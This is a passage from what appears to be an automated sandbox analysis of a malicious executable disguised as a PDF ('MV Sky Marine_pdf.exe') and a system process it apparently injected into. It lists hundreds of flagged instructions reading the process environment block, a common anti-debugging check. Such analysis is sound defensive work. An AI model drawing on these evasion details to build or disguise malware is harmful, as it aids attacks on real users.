          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h]3_2_00ABAD30
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h]3_2_00AF3D43
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h]3_2_00B33540
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h]3_2_00AD7D50
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h]3_2_00B346A7
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h]3_2_00B4FE87
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]3_2_00AE16E0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h]3_2_00AC76E2
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h]3_2_00AE36CC
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]3_2_00AF8EC7
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h]3_2_00B88ED6
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]3_2_00B6FEC0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]3_2_00B6FE3F
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]3_2_00ABE620
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]3_2_00AE8E00
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]3_2_00B71608
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]3_2_00AC766D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC8794 mov eax, dword ptr fs:[00000030h]3_2_00AC8794
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF37F5 mov eax, dword ptr fs:[00000030h]3_2_00AF37F5
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEE730 mov eax, dword ptr fs:[00000030h]3_2_00AEE730
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADF716 mov eax, dword ptr fs:[00000030h]3_2_00ADF716
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ACFF60 mov eax, dword ptr fs:[00000030h]3_2_00ACFF60
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B88F6A mov eax, dword ptr fs:[00000030h]3_2_00B88F6A
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ACEF40 mov eax, dword ptr fs:[00000030h]3_2_00ACEF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338E730 mov eax, dword ptr fs:[00000030h]8_2_0338E730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428B58 mov eax, dword ptr fs:[00000030h]8_2_03428B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03354F2E mov eax, dword ptr fs:[00000030h]8_2_03354F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03354F2E mov eax, dword ptr fs:[00000030h]8_2_03354F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428F6A mov eax, dword ptr fs:[00000030h]8_2_03428F6A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EFF10 mov eax, dword ptr fs:[00000030h]8_2_033EFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EFF10 mov eax, dword ptr fs:[00000030h]8_2_033EFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03383B7A mov eax, dword ptr fs:[00000030h]8_2_03383B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03383B7A mov eax, dword ptr fs:[00000030h]8_2_03383B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0342070D mov eax, dword ptr fs:[00000030h]8_2_0342070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0342070D mov eax, dword ptr fs:[00000030h]8_2_0342070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335DB60 mov ecx, dword ptr fs:[00000030h]8_2_0335DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336FF60 mov eax, dword ptr fs:[00000030h]8_2_0336FF60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0341131B mov eax, dword ptr fs:[00000030h]8_2_0341131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335F358 mov eax, dword ptr fs:[00000030h]8_2_0335F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335DB40 mov eax, dword ptr fs:[00000030h]8_2_0335DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336EF40 mov eax, dword ptr fs:[00000030h]8_2_0336EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03361B8F mov eax, dword ptr fs:[00000030h]8_2_03361B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03361B8F mov eax, dword ptr fs:[00000030h]8_2_03361B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340D380 mov ecx, dword ptr fs:[00000030h]8_2_0340D380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0341138A mov eax, dword ptr fs:[00000030h]8_2_0341138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03425BA5 mov eax, dword ptr fs:[00000030h]8_2_03425BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335E620 mov eax, dword ptr fs:[00000030h]8_2_0335E620
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340B260 mov eax, dword ptr fs:[00000030h]8_2_0340B260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340B260 mov eax, dword ptr fs:[00000030h]8_2_0340B260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428A62 mov eax, dword ptr fs:[00000030h]8_2_03428A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335C600 mov eax, dword ptr fs:[00000030h]8_2_0335C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335C600 mov eax, dword ptr fs:[00000030h]8_2_0335C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335C600 mov eax, dword ptr fs:[00000030h]8_2_0335C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0339927A mov eax, dword ptr fs:[00000030h]8_2_0339927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336766D mov eax, dword ptr fs:[00000030h]8_2_0336766D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359240 mov eax, dword ptr fs:[00000030h]8_2_03359240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359240 mov eax, dword ptr fs:[00000030h]8_2_03359240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359240 mov eax, dword ptr fs:[00000030h]8_2_03359240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359240 mov eax, dword ptr fs:[00000030h]8_2_03359240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340FE3F mov eax, dword ptr fs:[00000030h]8_2_0340FE3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340FEC0 mov eax, dword ptr fs:[00000030h]8_2_0340FEC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338FAB0 mov eax, dword ptr fs:[00000030h]8_2_0338FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428ED6 mov eax, dword ptr fs:[00000030h]8_2_03428ED6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033D46A7 mov eax, dword ptr fs:[00000030h]8_2_033D46A7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338D294 mov eax, dword ptr fs:[00000030h]8_2_0338D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338D294 mov eax, dword ptr fs:[00000030h]8_2_0338D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EFE87 mov eax, dword ptr fs:[00000030h]8_2_033EFE87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033676E2 mov eax, dword ptr fs:[00000030h]8_2_033676E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033816E0 mov ecx, dword ptr fs:[00000030h]8_2_033816E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03420EA5 mov eax, dword ptr fs:[00000030h]8_2_03420EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03420EA5 mov eax, dword ptr fs:[00000030h]8_2_03420EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03420EA5 mov eax, dword ptr fs:[00000030h]8_2_03420EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033836CC mov eax, dword ptr fs:[00000030h]8_2_033836CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338513A mov eax, dword ptr fs:[00000030h]8_2_0338513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338513A mov eax, dword ptr fs:[00000030h]8_2_0338513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03363D34 mov eax, dword ptr fs:[00000030h]8_2_03363D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03384D3B mov eax, dword ptr fs:[00000030h]8_2_03384D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03384D3B mov eax, dword ptr fs:[00000030h]8_2_03384D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03384D3B mov eax, dword ptr fs:[00000030h]8_2_03384D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335AD30 mov eax, dword ptr fs:[00000030h]8_2_0335AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03374120 mov eax, dword ptr fs:[00000030h]8_2_03374120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03374120 mov eax, dword ptr fs:[00000030h]8_2_03374120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03374120 mov eax, dword ptr fs:[00000030h]8_2_03374120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03374120 mov eax, dword ptr fs:[00000030h]8_2_03374120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03374120 mov ecx, dword ptr fs:[00000030h]8_2_03374120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359100 mov eax, dword ptr fs:[00000030h]8_2_03359100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359100 mov eax, dword ptr fs:[00000030h]8_2_03359100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359100 mov eax, dword ptr fs:[00000030h]8_2_03359100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0337C577 mov eax, dword ptr fs:[00000030h]8_2_0337C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0337C577 mov eax, dword ptr fs:[00000030h]8_2_0337C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335B171 mov eax, dword ptr fs:[00000030h]8_2_0335B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335B171 mov eax, dword ptr fs:[00000030h]8_2_0335B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03377D50 mov eax, dword ptr fs:[00000030h]8_2_03377D50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0337B944 mov eax, dword ptr fs:[00000030h]8_2_0337B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0337B944 mov eax, dword ptr fs:[00000030h]8_2_0337B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428D34 mov eax, dword ptr fs:[00000030h]8_2_03428D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03393D43 mov eax, dword ptr fs:[00000030h]8_2_03393D43
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033D3540 mov eax, dword ptr fs:[00000030h]8_2_033D3540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033835A1 mov eax, dword ptr fs:[00000030h]8_2_033835A1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338FD9B mov eax, dword ptr fs:[00000030h]8_2_0338FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338FD9B mov eax, dword ptr fs:[00000030h]8_2_0338FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03408DF1 mov eax, dword ptr fs:[00000030h]8_2_03408DF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0337C182 mov eax, dword ptr fs:[00000030h]8_2_0337C182
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338A185 mov eax, dword ptr fs:[00000030h]8_2_0338A185
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03352D8A mov eax, dword ptr fs:[00000030h]8_2_03352D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03352D8A mov eax, dword ptr fs:[00000030h]8_2_03352D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03352D8A mov eax, dword ptr fs:[00000030h]8_2_03352D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03352D8A mov eax, dword ptr fs:[00000030h]8_2_03352D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03352D8A mov eax, dword ptr fs:[00000030h]8_2_03352D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335B1E1 mov eax, dword ptr fs:[00000030h]8_2_0335B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335B1E1 mov eax, dword ptr fs:[00000030h]8_2_0335B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335B1E1 mov eax, dword ptr fs:[00000030h]8_2_0335B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338BC2C mov eax, dword ptr fs:[00000030h]8_2_0338BC2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336B02A mov eax, dword ptr fs:[00000030h]8_2_0336B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336B02A mov eax, dword ptr fs:[00000030h]8_2_0336B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336B02A mov eax, dword ptr fs:[00000030h]8_2_0336B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336B02A mov eax, dword ptr fs:[00000030h]8_2_0336B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033D7016 mov eax, dword ptr fs:[00000030h]8_2_033D7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033D7016 mov eax, dword ptr fs:[00000030h]8_2_033D7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033D7016 mov eax, dword ptr fs:[00000030h]8_2_033D7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03412073 mov eax, dword ptr fs:[00000030h]8_2_03412073
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03421074 mov eax, dword ptr fs:[00000030h]8_2_03421074
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03411C06 mov eax, dword ptr fs:[00000030h]8_2_03411C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0342740D mov eax, dword ptr fs:[00000030h]8_2_0342740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0342740D mov eax, dword ptr fs:[00000030h]8_2_0342740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0342740D mov eax, dword ptr fs:[00000030h]8_2_0342740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03424015 mov eax, dword ptr fs:[00000030h]8_2_03424015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03424015 mov eax, dword ptr fs:[00000030h]8_2_03424015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0337746D mov eax, dword ptr fs:[00000030h]8_2_0337746D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03370050 mov eax, dword ptr fs:[00000030h]8_2_03370050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03370050 mov eax, dword ptr fs:[00000030h]8_2_03370050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EC450 mov eax, dword ptr fs:[00000030h]8_2_033EC450
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EC450 mov eax, dword ptr fs:[00000030h]8_2_033EC450
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338F0BF mov ecx, dword ptr fs:[00000030h]8_2_0338F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338F0BF mov eax, dword ptr fs:[00000030h]8_2_0338F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338F0BF mov eax, dword ptr fs:[00000030h]8_2_0338F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428CD6 mov eax, dword ptr fs:[00000030h]8_2_03428CD6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033990AF mov eax, dword ptr fs:[00000030h]8_2_033990AF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359080 mov eax, dword ptr fs:[00000030h]8_2_03359080
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033D3884 mov eax, dword ptr fs:[00000030h]8_2_033D3884
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033D3884 mov eax, dword ptr fs:[00000030h]8_2_033D3884
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_034114FB mov eax, dword ptr fs:[00000030h]8_2_034114FB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EB8D0 mov eax, dword ptr fs:[00000030h]8_2_033EB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EB8D0 mov ecx, dword ptr fs:[00000030h]8_2_033EB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EB8D0 mov eax, dword ptr fs:[00000030h]8_2_033EB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EB8D0 mov eax, dword ptr fs:[00000030h]8_2_033EB8D0
